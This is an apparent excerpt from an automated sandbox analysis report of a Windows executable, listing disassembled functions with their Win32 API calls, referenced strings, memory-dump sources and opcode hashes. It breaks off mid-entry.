                                                                        Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 708495834-557222456
                                                                        • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                        • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                        Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                        • String ID: .lnk
                                                                        • API String ID: 886957087-24824748
                                                                        • Opcode ID: 48a1d34917043e70e182b84fcbd2d7ab1472f0407b57f76baed4e897f1b87864
                                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                        • Opcode Fuzzy Hash: 48a1d34917043e70e182b84fcbd2d7ab1472f0407b57f76baed4e897f1b87864
                                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                        Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                        Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \$]$h
                                                                        • API String ID: 4104443479-3262404753
                                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                        Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                        • String ID: <$@
                                                                        • API String ID: 2417854910-1426351568
                                                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                        Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 3705125965-3916222277
                                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                        Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem
                                                                        • String ID: 0
                                                                        • API String ID: 135850232-4108050209
                                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                        Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                        Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                        Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 3375834691-2298589950
                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                        Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: $<
                                                                        • API String ID: 4104443479-428540627
                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                        Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                        Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                        Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                        Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
